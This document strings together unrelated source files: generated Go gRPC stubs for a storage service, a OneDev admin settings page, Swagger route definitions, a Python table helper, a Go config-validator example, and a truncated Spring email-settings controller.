0xcf, 0x48, 0xb3, 0x8b, 0xa0, 0x77, 0x86, 0x23, 0x36, 0xb1, 0x2f, 0xc3, 0xa9, 0x07, 0x6e, 0x3c, 0x75, 0x3e, 0x1e, 0xf1, 0x2b, 0x77, 0xdd, 0x18, 0xad, 0x28, 0x39, 0x7c, 0x69, 0x7f, 0xaf, 0x80, 0xfe, 0xf1, 0x98, 0x46, 0x13, 0xf2, 0x6f, 0xd0, 0xd7, 0x7d, 0x3a, 0xf0, 0xa4, 0x8d, 0x65, 0x6e, 0x63, 0x21, 0x52, 0x4d, 0xc5, 0x11, 0x74, 0x72, 0x1e, 0xd4, 0xc7, 0x23, 0x0c, 0x4f, 0xb5, 0x55, 0x44, 0x95, 0x8f, 0x47, 0x8e, 0xfa, 0x78, 0xc4, 0x3f, 0x98, 0x4f, 0xf0, 0x83, 0x11, 0x65, 0x2c, 0x36, 0x1c, 0x8f, 0x70, 0x81, 0x9f, 0x47, 0x21, 0x83, 0x47, 0x29, 0xd5, 0x99, 0x0a, 0xd8, 0xcb, 0xa0, 0x6f, 0xf8, 0x43, 0x9f, 0xf1, 0x6a, 0x5c, 0x4f, 0xa1, 0xd7, 0xc1, 0x35, 0x57, 0x80, 0x4c, 0x54, 0xae, 0x3b, 0x62, 0x63, 0xff, 0xac, 0x80, 0xf1, 0x74, 0xc4, 0xf1, 0xfb, 0x68, 0xdb, 0xff, 0x0b, 0xc6, 0xbd, 0x1e, 0x0f, 0x83, 0xb4, 0xff, 0x34, 0x5a, 0x22, 0x4e, 0x0b, 0x86, 0x23, 0x05, 0xde, 0x89, 0x37, 0x9f, 0x81, 0xfe, 0xc4, 0xed, 0x53, 0x8f, 0x27, 0x6a, 0xe3, 0x35, 0x89, 0xc2, 0x24, 0x5a, 0x50, 0x7c, 0xe0, 0xc6, 0x0f, 0x39, 0x20, 0xa8, 0x98, 0x90, 0x64, 0xcb, 0x61, 0xfe, 0x11, 0x7d, 0xc1, 0x30, 0x0e, 0xc2, 0x8a, 0x74, 0x6f, 0x6f, 0x41, 0x09, 0xaf, 0xee, 0xb6, 0x63, 0x1e, 0xab, 0xf4, 0xf6, 0xf2, 0x5b, 0xdd, 0xfa, 0x9d, 0xc2, 0x61, 0x61, 0x1c, 0xb0, 0xd5, 0x89, 0x00, 0xc5, 0x1b, 0x60, 0x60, 0xb3, 0x88, 0xa5, 0xe9, 0xff, 0x9a, 0xb6, 0x12, 0x29, 0x22, 0x36, 0xb1, 0xc0, 0x38, 0x29, 0x5c, 0xbb, 0x0d, 0x95, 0x0c, 0xf9, 0x28, 0x70, 0xd1, 0xb2, 0xe0, 0xf2, 0x83, 0x02, 0x86, 0x38, 0x4b, 0x96, 0x0e, 0x28, 0x3f, 0x3f, 0x55, 0x1e, 0xbf, 0x56, 0xed, 0xc6, 0x51, 0x6a, 0xaf, 0x66, 0xd5, 0x56, 0x64, 0xfa, 0xb3, 0xde, 0x64, 0x2d, 0xe9, 0xe5, 0x0a, 0x27, 0x3e, 0x29, 0x6c, 0x5c, 0x84, 0x72, 0x94, 0xdc, 0x61, 0x69, 0x02, 0xc0, 0x53, 0x82, 0xfd, 0xa3, 0x02, 0xb3, 0x59, 0x2d, 0xe4, 0x83, 0xac, 0xb8, 0xf0, 0xbb, 0x8e, 0xb7, 0x65, 0xa5, 0x9a, 0xe9, 0x4a, 0x04, 0x60, 0x7a, 0xa4, 0x76, 0x17, 0xaa, 0x79, 0xe6, 0x51, 0xd1, 0x2f, 0x65, 0x7d, 0xfe, 0x5d, 0x05, 0xb5, 0xf3, 0x8c, 0x5c, 0x02, 0x83, 0x06, 0xcc, 0x67, 0x93, 0x03, 0x9e, 0x4a, 0x2a, 0xf9, 0xcf, 0x41, 0xbc, 0x15, 0x40, 0xd0, 0x79, 0x96, 0x02, 0x2e, 0x99, 0xe7, 0x7e, 0x24, 0x7d, 0x4b, 0xcb, 0x7d, 0xf7, 0x53, 0x06, 0xb9, 0x9c, 0xa6, 0xb8, 0x80, 0x8a, 0x2a, 0x99, 0x14, 0x27, 0x69, 0x25, 0x37, 0x60, 0x76, 0x37, 0xe3, 0x3c, 0x3e, 0x01, 0x92, 0xe4, 0xe5, 0x32, 0x94, 0x13, 0x23, 0xcb, 0x50, 0xea, 0xed, 0xfa, 0x03, 0x2f, 0xa2, 0x81, 0x65, 0xa0, 0x01, 0x67, 0xa5, 0x95, 0xcd, 0x35, 0x49, 0x17, 0xd1, 0x4b, 0xc5, 0x6a, 0x5d, 0x98, 0xcb, 0xb1, 0x5e, 0x13, 0x3b, 0x3b, 0xff, 0x09, 0xcd, 0xca, 0x2b, 0xb1, 0x18, 0xb3, 0x91, 0xfc, 0x02, 0x8a, 0x92, 0x4a, 0xfe, 0x99, 0xab, 0xfe, 0x34, 0x54, 0x6f, 0x53, 0xa8, 0x57, 0xc0, 0xe8, 0x3c, 0xc3, 0xf3, 0x7f, 0x75, 0xb9, 0xfd, 0x52, 0x85, 0x39, 0xec, 0x3f, 0x88, 0xed, 0x27, 0xed, 0x40, 0xf3, 0x50, 0xdc, 0x1b, 0xd3, 0xc8, 0x3f, 0xd0, 0xb4, 0xc5, 0x9d, 0x09, 0x8b, 0xac, 0x80, 0x1e, 0x87, 0x11, 0x4b, 0x92, 0x2d, 0x90, 0x22, 0xa7, 0xbc, 0xb9, 0xc9, 0xf9, 0x22, 0xe6, 0x42, 0x96, 0x3f, 0x1c, 0x06, 0x08, 0xe9, 0x85, 0xcc, 0xc3, 0x01, 0x71, 0xdd, 0x11, 0x8c, 0xda, 0x3a, 0xc0, 0xf4, 0xd8, 0x51, 0xf9, 0xa8, 0xca, 0x7c, 0xf0, 0x13, 0x6d, 0x3f, 0xca, 0xe6, 0xe3, 0xa5, 0x02, 0xa6, 0x00, 0x7a, 0xf9, 0xee, 0x39, 0x69, 0x34, 0x2e, 0x80, 0xea, 0x7b, 0xf2, 0x81, 0x9f, 0xe9, 0x30, 0xaa, 0xef, 0x91, 0x2b, 0x50, 0x1c, 0xa3, 0x8a, 0x24, 0x08, 0x95, 0x4c, 0x7f, 0x71, 0x12, 0x1e, 0x6f, 0xb6, 0x95, 0x4d, 0xca, 0x04, 0xe0, 0x9c, 0xd0, 0x8a, 0x7a, 0xe6, 0x55, 0xb0, 0x5a, 0xe5, 0x47, 0xca, 0x3f, 0x29, 0x86, 0x2d, 0x6c, 0xe1, 0x2c, 0x1e, 0xda, 0x18, 0x5f, 0xbc, 0xda, 0xe1, 0x17, 0x2f, 0x32, 0x6c, 0x17, 0xca, 0x6d, 0x3a, 0xa0, 0x7f, 0xa3, 0x11, 0xf6, 0x73, 0x98, 0xbd, 0x4f, 0x99, 0xac, 0xe7, 0x77, 0x1e, 0xf0, 0x85, 0x8f, 0xa0, 0x9c, 0x8e, 0x35, 0x64, 0x4e, 0x6e, 0x56, 0x43, 0xb6, 0x6b, 0xce, 0x10, 0x53, 0xb6, 0x32, 0x5e, 0x2f, 0x9d, 0xc0, 0x33, 0x15, 0x52, 0x05, 0x10, 0xd2, 0x21, 0xdf, 0xab, 0xe9, 0x81, 0x47, 0x61, 0x40, 0x4d, 0x6d, 0x61, 0x4f, 0x8e, 0x08, 0xfc, 0x24, 0x2e, 0x44, 0x70, 0x3c, 0x71, 0x17, 0x52, 0x9e, 0x44, 0xfe, 0xbe, 0xcb, 0xa8, 0xa9, 0x10, 0x00, 0x03, 0x29, 0xcb, 0xa6, 0x9a, 0xae, 0x5b, 0xa6, 0x96, 0xae, 0x57, 0xcc, 0x02, 0x39, 0x05, 0x15, 0x5c, 0xaf, 0x47, 0x3e, 0x0d, 0x3c, 0x53, 0x4f, 0x09, 0x4f, 0xc6, 0xdb, 0x03, 0xbf, 0x67, 0x1a, 0x0b, 0x77, 0xf9, 0x5b, 0x8a, 0x18, 0xa0, 0x76, 0xf6, 0xcc, 0x19, 0xfe, 0x7b, 0x9f, 0x99, 0x0a, 0xfe, 0x52, 0x53, 0xe5, 0xbf, 0x1b, 0xcc, 0xd4, 0xf0, 0x97, 0x9a, 0x05, 0xfe, 0xfb, 0x88, 0x9a, 0x3a, 0xff, 0xed, 0x06, 0xa6, 0xb1, 0x70, 0x13, 0x66, 0xb3, 0x4f, 0x17, 0x52, 0x04, 0x6d, 0x93, 0x32, 0x73, 0x86, 0x94, 0xa0, 0xd0, 0x0d, 0x7a, 0x91, 0xa9, 0x70, 0xd2, 0x3d, 0xcf, 0x13, 0x36, 0x3a, 0x74, 0x18, 0xee, 0x73, 0x47, 0x37, 0x32, 0x8f, 0x18, 0x61, 0x70, 0xe4, 0x07, 0x7d, 0x73, 0x86, 0x94, 0x41, 0xef, 0x06, 0xec, 0xe6, 0x75, 0x71, 0xb0, 0x1b, 0x30, 0x71, 0xb0, 0x1d, 0x8e, 0xb7, 0x07, 0xd4, 0xd4, 0xf8, 0xbd, 0xab, 0x61, 0x38, 0x30, 0x0b, 0x5c, 0x72, 0x75, 0xc2, 0x68, 0x6c, 0xea, 0x0b, 0x17, 0xa1, 0x28, 0xcb, 0x0d, 0xb5, 0xc5, 0x3d, 0x61, 0x40, 0x9b, 0xc6, 0x3d, 0x53, 0x69, 0xfd, 0x52, 0x80, 0xe2, 0xa6, 0x18, 0xd3, 0x49, 0x13, 0x2a, 0xde, 0x74, 0x6e, 0x20, 0x62, 0x4a, 0xca, 0x4f, 0x12, 0x35, 0x39, 0x3a, 0xf0, 0x97, 0x2b, 0xb9, 0x92, 0xc8, 0x8b, 0x69, 0x3c, 0x33, 0x2a, 0xe4, 0xc4, 0xae, 0x82, 0x81, 0x83, 0x03, 0x25, 0x02, 0xdf, 0x0f, 0xce, 0x0c, 0x35, 0xd9, 0x77, 0x48, 0x53, 0xce, 0x20, 0x34, 0xe9, 0x11, 0x44, 0x4c, 0x74, 0x99, 0xc1, 0x20, 0x77, 0x71, 0x13, 0xaa, 0x11, 0xc6, 0xec, 0x98, 0xf2, 0xb7, 0xf2, 0x7d, 0x8a, 0x9c, 0x39, 0xdc, 0xa1, 0xe8, 0x5e, 0xed, 0x70, 0xdf, 0x22, 0x0d, 0x28, 0xf5, 0x71, 0x4a, 0xf0, 0x62, 0xa9, 0x22, 0x33, 0x34, 0x24, 0x2a, 0x10, 0xed, 0xaf, 0x01, 0xf4, 0x53, 0x48, 0x25, 0xe4, 0x30, 0xc6, 0x4a, 0x69, 0xd1, 0x78, 0x5a, 0x30, 0x37, 0xce, 0x42, 0x9e, 0x0c, 0xd0, 0x41, 0x18, 0xcc, 0x39, 0xd1, 0x80, 0x52, 0x2c, 0xb1, 0x49, 0xda, 0x92, 0x81, 0xaa, 0x9c, 0xe4, 0x3c, 0x18, 0x1e, 0x56, 0x08, 0xa9, 0xca, 0x4c, 0x4a, 0x2c, 0xc9, 0x49, 0xfd, 0x0f, 0xca, 0xfd, 0x04, 0x01, 0xc8, 0xe9, 0xc4, 0xe0, 0x14, 0x11, 0x6a, 0xd9, 0x8e, 0xbf, 0x6d, 0xe0, 0x7f, 0x60, 0x56, 0xfe, 0x0c, 0x00, 0x00, 0xff, 0xff, 0xdd, 0x0c, 0x59, 0xa1, 0xda, 0x11, 0x00, 0x00, } // Reference imports to suppress errors if they are not otherwise used. var _ context.Context var _ grpc.ClientConn // This is a compile-time assertion to ensure that this generated file // is compatible with the grpc package it is being compiled against. const _ = grpc.SupportPackageIsVersion4 // StorageClient is the client API for Storage service. // // For semantics around ctx use and closing/ending streaming RPCs, please refer to https://godoc.org/google.golang.org/grpc#ClientConn.NewStream. type StorageClient interface { DefineEType(ctx context.Context, in *DefineETypeReq, opts ...grpc.CallOption) (*Empty, error) DefineRType(ctx context.Context, in *RType, opts ...grpc.CallOption) (*Empty, error) Create(ctx context.Context, in *CreateEWithRsReq, opts ...grpc.CallOption) (*E, error) CreateRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) RemoveRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) HasRelations(ctx context.Context, in *HasRelationsReq, opts ...grpc.CallOption) (*HasRelations, error) GetByIds(ctx context.Context, in *GetByIDsReq, opts ...grpc.CallOption) (*EList, error) GetByQuery(ctx context.Context, in *GetByQueryReq, opts ...grpc.CallOption) (*Paged, error) UpdateContent(ctx context.Context, in *UpdateContentReq, opts ...grpc.CallOption) (*Empty, error) SetState(ctx context.Context, in *SetStateReq, opts ...grpc.CallOption) (*Empty, error) Delete(ctx context.Context, in *DeleteReq, opts ...grpc.CallOption) (*Empty, error) GetCounts(ctx context.Context, in *GetCountsReq, opts ...grpc.CallOption) (*Counts, error) } type storageClient struct { cc *grpc.ClientConn } func NewStorageClient(cc *grpc.ClientConn) StorageClient { return &storageClient{cc} } func (c *storageClient) DefineEType(ctx context.Context, in *DefineETypeReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/defineEType", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) DefineRType(ctx context.Context, in *RType, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/defineRType", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) Create(ctx context.Context, in *CreateEWithRsReq, opts ...grpc.CallOption) (*E, error) { out := new(E) err := c.cc.Invoke(ctx, "/def.Storage/create", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) CreateRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/createRelation", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) RemoveRelation(ctx context.Context, in *RelationReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/removeRelation", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) HasRelations(ctx context.Context, in *HasRelationsReq, opts ...grpc.CallOption) (*HasRelations, error) { out := new(HasRelations) err := c.cc.Invoke(ctx, "/def.Storage/hasRelations", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) GetByIds(ctx context.Context, in *GetByIDsReq, opts ...grpc.CallOption) (*EList, error) { out := new(EList) err := c.cc.Invoke(ctx, "/def.Storage/getByIds", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) GetByQuery(ctx context.Context, in *GetByQueryReq, opts ...grpc.CallOption) (*Paged, error) { out := new(Paged) err := c.cc.Invoke(ctx, "/def.Storage/getByQuery", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) UpdateContent(ctx context.Context, in *UpdateContentReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/updateContent", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) SetState(ctx context.Context, in *SetStateReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/setState", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) Delete(ctx context.Context, in *DeleteReq, opts ...grpc.CallOption) (*Empty, error) { out := new(Empty) err := c.cc.Invoke(ctx, "/def.Storage/delete", in, out, opts...) if err != nil { return nil, err } return out, nil } func (c *storageClient) GetCounts(ctx context.Context, in *GetCountsReq, opts ...grpc.CallOption) (*Counts, error) { out := new(Counts) err := c.cc.Invoke(ctx, "/def.Storage/getCounts", in, out, opts...) if err != nil { return nil, err } return out, nil } // StorageServer is the server API for Storage service. type StorageServer interface { DefineEType(context.Context, *DefineETypeReq) (*Empty, error) DefineRType(context.Context, *RType) (*Empty, error) Create(context.Context, *CreateEWithRsReq) (*E, error) CreateRelation(context.Context, *RelationReq) (*Empty, error) RemoveRelation(context.Context, *RelationReq) (*Empty, error) HasRelations(context.Context, *HasRelationsReq) (*HasRelations, error) GetByIds(context.Context, *GetByIDsReq) (*EList, error) GetByQuery(context.Context, *GetByQueryReq) (*Paged, error) UpdateContent(context.Context, *UpdateContentReq) (*Empty, error) SetState(context.Context, *SetStateReq) (*Empty, error) Delete(context.Context, *DeleteReq) (*Empty, error) GetCounts(context.Context, *GetCountsReq) (*Counts, error) } // UnimplementedStorageServer can be embedded to have forward compatible implementations. type UnimplementedStorageServer struct { } func (*UnimplementedStorageServer) DefineEType(ctx context.Context, req *DefineETypeReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method DefineEType not implemented") } func (*UnimplementedStorageServer) DefineRType(ctx context.Context, req *RType) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method DefineRType not implemented") } func (*UnimplementedStorageServer) Create(ctx context.Context, req *CreateEWithRsReq) (*E, error) { return nil, status.Errorf(codes.Unimplemented, "method Create not implemented") } func (*UnimplementedStorageServer) CreateRelation(ctx context.Context, req *RelationReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method CreateRelation not implemented") } func (*UnimplementedStorageServer) RemoveRelation(ctx context.Context, req *RelationReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method RemoveRelation not implemented") } func (*UnimplementedStorageServer) HasRelations(ctx context.Context, req *HasRelationsReq) (*HasRelations, error) { return nil, status.Errorf(codes.Unimplemented, "method HasRelations not implemented") } func (*UnimplementedStorageServer) GetByIds(ctx context.Context, req *GetByIDsReq) (*EList, error) { return nil, status.Errorf(codes.Unimplemented, "method GetByIds not implemented") } func (*UnimplementedStorageServer) GetByQuery(ctx context.Context, req *GetByQueryReq) (*Paged, error) { return nil, status.Errorf(codes.Unimplemented, "method GetByQuery not implemented") } func (*UnimplementedStorageServer) UpdateContent(ctx context.Context, req *UpdateContentReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method UpdateContent not implemented") } func (*UnimplementedStorageServer) SetState(ctx context.Context, req *SetStateReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method SetState not implemented") } func (*UnimplementedStorageServer) Delete(ctx context.Context, req *DeleteReq) (*Empty, error) { return nil, status.Errorf(codes.Unimplemented, "method Delete not implemented") } func (*UnimplementedStorageServer) GetCounts(ctx context.Context, req *GetCountsReq) (*Counts, error) { return nil, status.Errorf(codes.Unimplemented, "method GetCounts not implemented") } func RegisterStorageServer(s *grpc.Server, srv StorageServer) { s.RegisterService(&_Storage_serviceDesc, srv) } func _Storage_DefineEType_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(DefineETypeReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).DefineEType(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/DefineEType", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).DefineEType(ctx, req.(*DefineETypeReq)) } return interceptor(ctx, in, info, handler) } func _Storage_DefineRType_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(RType) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).DefineRType(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/DefineRType", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).DefineRType(ctx, req.(*RType)) } return interceptor(ctx, in, info, handler) } func _Storage_Create_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(CreateEWithRsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).Create(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/Create", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).Create(ctx, req.(*CreateEWithRsReq)) } return interceptor(ctx, in, info, handler) } func _Storage_CreateRelation_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(RelationReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).CreateRelation(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/CreateRelation", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).CreateRelation(ctx, req.(*RelationReq)) } return interceptor(ctx, in, info, handler) } func _Storage_RemoveRelation_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(RelationReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).RemoveRelation(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/RemoveRelation", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).RemoveRelation(ctx, req.(*RelationReq)) } return interceptor(ctx, in, info, handler) } func _Storage_HasRelations_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(HasRelationsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).HasRelations(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/HasRelations", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).HasRelations(ctx, req.(*HasRelationsReq)) } return interceptor(ctx, in, info, handler) } func _Storage_GetByIds_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(GetByIDsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).GetByIds(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/GetByIds", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).GetByIds(ctx, req.(*GetByIDsReq)) } return interceptor(ctx, in, info, handler) } func _Storage_GetByQuery_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(GetByQueryReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).GetByQuery(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/GetByQuery", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).GetByQuery(ctx, req.(*GetByQueryReq)) } return interceptor(ctx, in, info, handler) } func _Storage_UpdateContent_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(UpdateContentReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).UpdateContent(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/UpdateContent", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).UpdateContent(ctx, req.(*UpdateContentReq)) } return interceptor(ctx, in, info, handler) } func _Storage_SetState_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(SetStateReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).SetState(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/SetState", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).SetState(ctx, req.(*SetStateReq)) } return interceptor(ctx, in, info, handler) } func _Storage_Delete_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(DeleteReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).Delete(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/Delete", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).Delete(ctx, req.(*DeleteReq)) } return interceptor(ctx, in, info, handler) } func _Storage_GetCounts_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(GetCountsReq) if err := dec(in); err != nil { return nil, err } if interceptor == nil { return srv.(StorageServer).GetCounts(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, FullMethod: "/def.Storage/GetCounts", } handler := func(ctx context.Context, req interface{}) (interface{}, error) { return srv.(StorageServer).GetCounts(ctx, req.(*GetCountsReq)) } return interceptor(ctx, in, info, handler) } var _Storage_serviceDesc = grpc.ServiceDesc{ ServiceName: "def.Storage", HandlerType: (*StorageServer)(nil), Methods: []grpc.MethodDesc{ { MethodName: "defineEType", Handler: _Storage_DefineEType_Handler, }, { MethodName: "defineRType", Handler: _Storage_DefineRType_Handler, }, { MethodName: "create", Handler: _Storage_Create_Handler, }, { MethodName: "createRelation", Handler: _Storage_CreateRelation_Handler, }, { MethodName: "removeRelation", Handler: _Storage_RemoveRelation_Handler, }, { MethodName: "hasRelations", Handler: _Storage_HasRelations_Handler, }, { MethodName: "getByIds", Handler: _Storage_GetByIds_Handler, }, { MethodName: "getByQuery", Handler: _Storage_GetByQuery_Handler, }, { MethodName: "updateContent", Handler: _Storage_UpdateContent_Handler, }, { MethodName: "setState", Handler: _Storage_SetState_Handler, }, { MethodName: "delete", Handler: _Storage_Delete_Handler, }, { MethodName: "getCounts", Handler: _Storage_GetCounts_Handler, }, }, Streams: []grpc.StreamDesc{}, Metadata: "storage.proto", }
package io.onedev.server.web.page.admin.performancesetting; import org.apache.wicket.Component; import org.apache.wicket.markup.html.basic.Label; import org.apache.wicket.markup.html.form.Form; import org.apache.wicket.request.mapper.parameter.PageParameters; import io.onedev.server.OneDev; import io.onedev.server.entitymanager.SettingManager; import io.onedev.server.model.support.administration.PerformanceSetting; import io.onedev.server.web.editable.BeanContext; import io.onedev.server.web.page.admin.AdministrationPage; @SuppressWarnings("serial") public class PerformanceSettingPage extends AdministrationPage { public PerformanceSettingPage(PageParameters params) { super(params); } @Override protected void onInitialize() { super.onInitialize(); PerformanceSetting performanceSetting = OneDev.getInstance(SettingManager.class).getPerformanceSetting(); Form<?> form = new Form<Void>("form") { @Override protected void onSubmit() { super.onSubmit(); OneDev.getInstance(SettingManager.class).savePerformanceSetting(performanceSetting); getSession().success("Performance setting has been saved"); setResponsePage(PerformanceSettingPage.class); } }; form.add(BeanContext.edit("editor", performanceSetting)); add(form); } @Override protected Component newTopbarTitle(String componentId) { return new Label(componentId, "Performance Setting"); } }
package definitions // swagger:route GET /api/v1/provisioning/policies provisioning stable RouteGetPolicyTree // // Get the notification policy tree. // // Responses: // 200: Route // description: The currently active notification routing tree // swagger:route PUT /api/v1/provisioning/policies provisioning stable RoutePutPolicyTree // // Sets the notification policy tree. // // Consumes: // - application/json // // Responses: // 202: Ack // 400: ValidationError // swagger:route DELETE /api/v1/provisioning/policies provisioning stable RouteResetPolicyTree // // Clears the notification policy tree. // // Consumes: // - application/json // // Responses: // 202: Ack // swagger:parameters RoutePutPolicyTree type Policytree struct { // The new notification routing tree to use // in:body Body Route }
def package_search_table(search_results): fields = OrderedDict([ ('NAME', lambda p: p['name']), ('VERSION', lambda p: p['currentVersion']), ('SELECTED', lambda p: p.get("selected", False)), ('FRAMEWORK', lambda p: p['framework']), ('DESCRIPTION', lambda p: p['description'] if len(p['description']) < 77 else p['description'][0:77] + "...") ]) packages = [] for package in search_results['packages']: package_ = copy.deepcopy(package) packages.append(package_) tb = table(fields, packages) tb.align['NAME'] = 'l' tb.align['VERSION'] = 'l' tb.align['SELECTED'] = 'l' tb.align['FRAMEWORK'] = 'l' tb.align['DESCRIPTION'] = 'l' return tb
// ExampleRegisterValidator register a custom validator with the name // `check_xyzUser`. It checks that the configuration value for route // `payment/serviceX/username` must be equal to string `xyzUser`. (boring // example) The validator `check_xyzUser` gets activated for route // `payment/serviceX/username` with event after_get. func ExampleRegisterValidator() { observer.RegisterValidator("check_xyzUser", func(s string) bool { return s == "xyzUser" }) cfgSrv := config.MustNewService(storage.NewMap( "stores/2/payment/serviceX/username", "xyzUser", "stores/3/payment/serviceX/username", "abcUser", ), config.Options{}) err := observer.RegisterWithJSON(cfgSrv, bytes.NewBufferString(`{"Collection":[ { "event":"after_get", "route":"payment/serviceX/username", "type":"validator", "condition":{"funcs":["utf8","check_xyzUser"]}} ]}`)) if err != nil { fmt.Printf("%+v\n", err) return } ps2 := config.MustNewPath("payment/serviceX/username").BindStore(2) val := cfgSrv.Get(ps2) fmt.Printf("%s\n", val.String()) val = cfgSrv.Get(ps2.BindStore(3)) fmt.Printf("%s\n", val.Error()) }
<reponame>poweretl/PowerETL<filename>etl-server/src/main/java/com/kollect/etl/controller/app/EmailSettingsController.java package com.kollect.etl.controller.app; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Controller; import org.springframework.ui.Model; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.RequestParam; import com.kollect.etl.service.app.EmailSettingsService; @Controller public class EmailSettingsController { @Autowired private EmailSettingsService emailSettingsService; /** * HTTP GET request to retrieve email settings * * @param model * a data structure of objects which needs to be rendered to view * @return emailSettingsForm pre-loaded with data */ @GetMapping(value = "/adminEmailSettings") public Object viewEmailSettings(Model model) { return this.emailSettingsService.getEmailSettings(model); } /** * HTTP POST request mapping to create or update email settings * * @param sendEmail * flag for sending or not sending email * @param userAuthentication * main authentication user * @param userName * the user who's sending the email * @param pass * <PASSWORD> * @param host * SMTP server name * @param recipient * a comma separated list of recipients * @param port * SMTP server port * @param subject * email subject for successful status * @param msg * email message content for successful status * @param subjErr * email subject for unsuccessful status * @param 